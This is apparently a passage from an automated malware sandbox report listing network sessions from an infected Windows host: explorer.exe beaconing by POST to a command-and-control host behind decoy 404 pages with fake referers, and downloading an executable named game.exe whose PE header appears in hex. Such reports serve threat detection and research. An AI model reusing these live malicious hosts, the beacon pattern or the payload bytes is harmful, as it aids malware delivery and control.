9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 81 f5 97 d4 78 2b 2c 62 98 ed 24 c6 ff c5 d4 d9 49 0a 8a 10 c4 44 b9 97 c4 fa be a8 48 96 9e 9b 55 1a f6 de e8 d0 9b 92 17 7d 69 05 79 4a 09 9f 3c bf 00 62 4b 65 fb 80 ab 5b 87 80 39 cd bb 78 96 64 a4 a4 a2 41 45 e8 03 ff 0e 4d e2 d0 97 23 3b 5e 04 e8 5a 9a 14 7a 59 92 17 7e d6 70 82 ba 4b 96 7e bb ee 1f 38 33 d5 53 6f 27 88 32 e7 ce 85 b9 9b 3b 22 2f d9 3d ff 24 3c 78 92 93 78 f9 7e 21 86 a5 ec 34
                                                            Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/arR`g1Q5ih.Kw:i/+".]pW!RYyM]O_[3_JTO))gxr?|^c[FXB$H)t|;fKMXKw[Ge)29E"|ay6N}o7=Up,Kk"HI?m|6NI^LdU[0z_$U5=PoV`GZdQJVTq5dIvy'$X9:-C'GrPmR`#>[qJ8-,sqK0Z"?+Qz`KJMQAd'\#&Q#2YBA@=C/fGB%4VF>"7"~K6*!?eti6'NGc:HNDZOJW%bJ}Tzl9\@d=V:"}bP1&@N!;KnGAcWJ`_ng";kz{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59x+,b$IDHU}iyJ<bKe[9xdAEM#;^ZzY~pK~83So'2;"/=$<xx~!4


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            34192.168.2.549823185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:55.880763054 CEST10455OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://lqvvicnwkv.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 145
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:55.957325935 CEST10456INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:55 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            35192.168.2.549824185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:56.061537027 CEST10457OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hmylopjj.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 165
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:56.145724058 CEST10457INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:56 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 29I:82OUcScS0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            36192.168.2.549825185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:56.593132019 CEST10458OUTGET /game.exe HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Host: sysaheu90.top
                                                            Oct 29, 2021 20:10:56.728715897 CEST10459INHTTP/1.1 200 OK
                                                            Date: Fri, 29 Oct 2021 18:10:56 GMT
                                                            Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                            Last-Modified: Fri, 29 Oct 2021 18:10:02 GMT
                                                            ETag: "92800-5cf81bc6a9a05"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 600064
                                                            Connection: close
                                                            Content-Type: application/octet-stream
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 15 19 94 43 74 77 c7 43 74 77 c7 43 74 77 c7 2c 02 dc c7 6e 74 77 c7 2c 02 e9 c7 61 74 77 c7 2c 02 dd c7 3c 74 77 c7 4a 0c e4 c7 44 74 77 c7 43 74 76 c7 3c 74 77 c7 2c 02 d8 c7 42 74 77 c7 2c 02 ed c7 42 74 77 c7 2c 02 ea c7 42 74 77 c7 52 69 63 68 43 74 77 c7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d 6f 8e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 a6 07 00 00 c4 70 02 00 00 00 00 c0 aa 05 00 00 10 00 00 00 c0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 78 02 00 04 00 00 d2 54 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 a9 07 00 50 00 00 00 00 40 77 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 77 02 38 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 9f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 a4 07 00 00 10 00 00 00 a6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 c0 07 00 00 16 00 00 00 aa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 75 6c 6f 66 69 76 e5 02 00 00 00 30 77 02 00 04 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 40 77 02 00 40 00 00 00 c4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 22 01 00 00 80 77 02 00 24 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CtwCtwCtw,ntw,atw,<twJDtwCtv<tw,Btw,Btw,BtwRichCtwPEL]o`p@xTP@w?w80@.textP `.dataio@.rulofiv0w@.rsrc?@w@@@.reloc"w$@B


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            37192.168.2.549828185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:00.016216993 CEST12183OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://pvxvmaqhni.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 229
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:00.098012924 CEST12476INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:00 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            38192.168.2.549829185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:00.217869043 CEST12477OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bhlsdp.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 354
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:00.294672012 CEST12478INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:00 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            39192.168.2.549830185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:00.504559040 CEST12479OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://vexln.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 309
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:00.586407900 CEST12480INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:00 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.549827162.159.133.233443C:\Users\user\AppData\Local\Temp\77DC.exe
                                                            TimestampkBytes transferredDirectionData


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            40192.168.2.549831185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:00.732418060 CEST12481OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ukjpg.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 189
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:00.811194897 CEST12482INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:00 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            41192.168.2.549832185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:01.060580015 CEST12483OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://oahqstcrl.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 113
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:01.135711908 CEST12483INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            42192.168.2.549833185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:11:01.283312082 CEST12484OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://sowcs.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 312
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:11:01.366837978 CEST12485INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:11:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
